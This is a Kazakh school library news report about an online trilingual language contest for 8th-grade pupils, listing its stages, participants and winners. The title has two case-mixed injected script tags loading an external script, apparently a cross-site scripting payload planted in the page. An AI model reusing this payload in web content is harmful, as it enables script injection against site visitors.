«Ғ.Әбдірахманұлы атындағы Қима орта мектебі» КММ-нің кітапханасы «Мәңгілік елімнің – мәңгілік тілі» атты тілдер онкүндігін онлайн өткізу бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.09.2020
Мектеп кітапханасында тілдер күніне арналған «Үштілділік – заман талабы» атты 8 сынып оқушыларының арасында қашықтықтан интеллектуалды сайыс өткізілді.
Сайыстың мақсаты: Оқушылардың тіл пәндеріне деген біліктіліктерін, білімдерін, дұрыс сөйлеу, жазу, оқу ептіліктерін арттыру.
Кіріспе: «Үш тұғырлы тіл» туралы идеясы мемлекет басшысы 2006 жылдың қазанында өткен Қазақстан халқы ассамблеясының ХІІ құрылтайында жария еткен болатын. Сондықтан мемлекеттің негізін құраушы аса маңызды үш фактордың бірі – тіл қолданысын кеңейтіп, позициясын нығайтуға үлес қосу – әрбір азамммың борышы. Сондықтан бүгінгі сайысымызға 6 оқушы қатысты. Сайыс 6 кезеңнен тұрады. Әр кезең бойынша 1-10 балға дейін бағаланды.
- Таныстыру.
- Мақалды аяқта.
- «Кім шапшаң» сұрақ-жауап.
- «Менің Отаным» тақырыбында өлең жолдарын оқу 3 тілде.
- Жұмбақты шеш.
- Қорытынды.
«Үштілділік – заман талабы» атты интеллектуалды сайысымызға жақсы белсене
қатысқан оқушылар Шарапов Расул, Кайнеденова Назира, Асылкулова Мадина, Еркинова Саида, Каиржанов Аман, Капан Алтын. Сайыс өз мәресіне жетті. «Үштілділік – заман талабы» интелектуалды сайысында ең үздік деп саналған оқушылар Кайнеденова Назира мен Шарапов Расул грамотамен марапатталды.
Қорытынды: Өскелең ұрпақты үш тілді: қазақ тілі, орыс тілі, ағылшын тілін оқып үйренуге ұмтылыс жасау заман талабы, болашақ ұрпаққа қажеттіліктен туындап отыр. Сондықтан біз де, болашақта өз үлесімізді қосыпақпыз.
Есенгулова Т.С.